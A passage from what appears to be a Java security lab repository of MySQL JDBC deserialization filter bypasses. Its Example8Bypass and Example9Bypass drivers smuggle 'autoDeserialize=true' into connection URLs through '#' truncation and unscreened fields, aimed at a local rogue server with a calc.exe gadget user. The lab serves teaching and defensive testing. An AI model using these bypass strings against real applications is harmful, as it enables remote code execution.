 * Lab driver for {@code Application8}, which screens {@code extra} and then appends
 * {@code autoDeserialize=false} to the end of the URL.
 *
 * <p>Here {@code extra} ends with {@code #}, so the text that {@code Application8} appends
 * afterwards is placed behind that character in the assembled URL. The README files this under
 * the {@code #} case and calls it a logic flaw: a safe default written after untrusted text is
 * not guaranteed to be honoured.
 */
public class Example8Bypass {
    /**
     * Calls {@code Application8.connection} with the field values below.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // Values under the caller's control.
        final String endpoint = "127.0.0.1:62787";
        final String account = "deser_CB_calc.exe";
        final String secret = "test&autoDeserialize=true";
        final String schema = "test";
        final String extraParams = "detectCustomCollations=true&#?";
        Application8.connection(endpoint, account, schema, secret, extraParams);
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example9.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application9;
/**
 * Lab driver for {@code Application9}, which screens {@code user}, {@code password} and
 * {@code extra}.
 *
 * <p>Here the denylisted text is in {@code password}, one of the screened fields, so this is
 * the case the filter catches.
 */
public class Example9 {
    /**
     * Calls {@code Application9.connection} with the field values below.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // Values under the caller's control.
        final String endpoint = "127.0.0.1:62787";
        final String account = "deser_CB_calc.exe";
        final String secret = "test&autoDeserialize=true&";
        final String schema = "test";
        final String extraParams = "detectCustomCollations=true&";
        Application9.connection(endpoint, account, schema, secret, extraParams);
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example9Bypass.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application9;
/**
 * Lab driver for {@code Application9}, which screens {@code user}, {@code password} and
 * {@code extra} but not {@code addr} or {@code db}.
 *
 * <p>Here the denylisted text is carried in {@code addr}, one of the unscreened fields. The
 * README attributes this case to the developer leaving some parameters unfiltered; compare
 * {@code Example10}, which sends the same inputs to a target that also checks the assembled
 * URL.
 */
public class Example9Bypass {
    /**
     * Calls {@code Application9.connection} with the field values below.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // Values under the caller's control.
        final String endpoint =
                "127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#";
        final String account = "deser_CB_calc.exe";
        final String secret = "test";
        final String schema = "test";
        final String extraParams = "";
        Application9.connection(endpoint, account, schema, secret, extraParams);
    }
}
gitextract_z5ohkhvb/
├── .gitignore
├── README.md
├── pom.xml
└── src/
└── main/
└── java/
└── org/
└── y4sec/
└── team/
├── app/
│ ├── Application1.java
│ ├── Application10.java
│ ├── Application2.java
│ ├── Application3.java
│ ├── Application4.java
│ ├── Application5.java
│ ├── Application6.java
│ ├── Application7.java
│ ├── Application8.java
│ └── Application9.java
└── exploit/
├── Example1.java
├── Example10.java
├── Example2.java
├── Example3.java
├── Example4.java
├── Example5.java
├── Example6.java
├── Example7.java
├── Example7Bypass.java
├── Example8.java
├── Example8Bypass.java
├── Example9.java
└── Example9Bypass.java
SYMBOL INDEX (54 symbols across 23 files)
FILE: src/main/java/org/y4sec/team/app/Application1.java
class Application1 (line 5) | public class Application1 {
method connection (line 6) | public static void connection(String url){
FILE: src/main/java/org/y4sec/team/app/Application10.java
class Application10 (line 5) | public class Application10 {
method connection (line 6) | public static void connection(String addr, String user, String db, Str...
method check (line 35) | private static String check(String params) {
FILE: src/main/java/org/y4sec/team/app/Application2.java
class Application2 (line 8) | public class Application2 {
method connection (line 9) | public static void connection(String url){
method check (line 22) | private static boolean check(String jdbcUrl){
FILE: src/main/java/org/y4sec/team/app/Application3.java
class Application3 (line 8) | public class Application3 {
method connection (line 9) | public static void connection(String url){
method check (line 22) | private static boolean check(String jdbcUrl){
FILE: src/main/java/org/y4sec/team/app/Application4.java
class Application4 (line 8) | public class Application4 {
method connection (line 9) | public static void connection(String url) {
method check (line 22) | private static boolean check(String jdbcUrl) {
FILE: src/main/java/org/y4sec/team/app/Application5.java
class Application5 (line 8) | public class Application5 {
method connection (line 9) | public static void connection(String url) {
method check (line 22) | private static boolean check(String jdbcUrl) {
FILE: src/main/java/org/y4sec/team/app/Application6.java
class Application6 (line 6) | public class Application6 {
method connection (line 7) | public static void connection(String addr,String user,String db,String...
FILE: src/main/java/org/y4sec/team/app/Application7.java
class Application7 (line 7) | public class Application7 {
method connection (line 8) | public static void connection(String addr,String user,String db,String...
method check (line 40) | private static boolean check(String params){
FILE: src/main/java/org/y4sec/team/app/Application8.java
class Application8 (line 5) | public class Application8 {
method connection (line 6) | public static void connection(String addr, String user, String db, Str...
method check (line 42) | private static boolean check(String params) {
FILE: src/main/java/org/y4sec/team/app/Application9.java
class Application9 (line 5) | public class Application9 {
method connection (line 6) | public static void connection(String addr, String user, String db, Str...
method check (line 33) | private static String check(String params) {
FILE: src/main/java/org/y4sec/team/exploit/Example1.java
class Example1 (line 5) | public class Example1 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example10.java
class Example10 (line 5) | public class Example10 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example2.java
class Example2 (line 5) | public class Example2 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example3.java
class Example3 (line 5) | public class Example3 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example4.java
class Example4 (line 5) | public class Example4 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example5.java
class Example5 (line 5) | public class Example5 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example6.java
class Example6 (line 5) | public class Example6 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example7.java
class Example7 (line 5) | public class Example7 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example7Bypass.java
class Example7Bypass (line 5) | public class Example7Bypass {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example8.java
class Example8 (line 5) | public class Example8 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example8Bypass.java
class Example8Bypass (line 5) | public class Example8Bypass {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example9.java
class Example9 (line 5) | public class Example9 {
method main (line 6) | public static void main(String[] args) {
FILE: src/main/java/org/y4sec/team/exploit/Example9Bypass.java
class Example9Bypass (line 5) | public class Example9Bypass {
method main (line 6) | public static void main(String[] args) {